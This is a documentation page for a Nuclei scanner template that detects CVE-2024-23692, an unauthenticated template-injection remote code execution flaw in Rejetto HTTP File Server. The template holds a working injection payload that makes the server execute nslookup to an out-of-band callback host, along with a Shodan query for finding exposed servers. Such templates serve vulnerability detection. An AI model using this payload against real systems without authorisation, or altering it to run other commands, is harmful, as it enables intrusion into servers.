Rejetto HTTP File Server - Template injection
ID: CVE-2024-23692
Severity: critical
Author: johnk3r
Tags: cve,cve2024,hfs,rejetto,rce,kev
Description
Section titled “Description”This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request.
YAML Source
Section titled “YAML Source”id: CVE-2024-23692
info: name: Rejetto HTTP File Server - Template injection author: johnk3r severity: critical description: | This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-23692 cwe-id: CWE-1336 metadata: verified: true max-request: 1 shodan-query: product:"HttpFileServer httpd" tags: cve,cve2024,hfs,rejetto,rce,kev
http: - method: GET path: - "{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}"
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns"
- type: word part: body words: - "rejetto"# digest: 4a0a004730450220266ebb0754936da88756f26dba560443b5632499e2647e69bbcba146e7dc9adb022100b97230c3427cb6ab00b086753698765249a715ed475a22b633ee2b284ef7aabd:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-23692.yaml"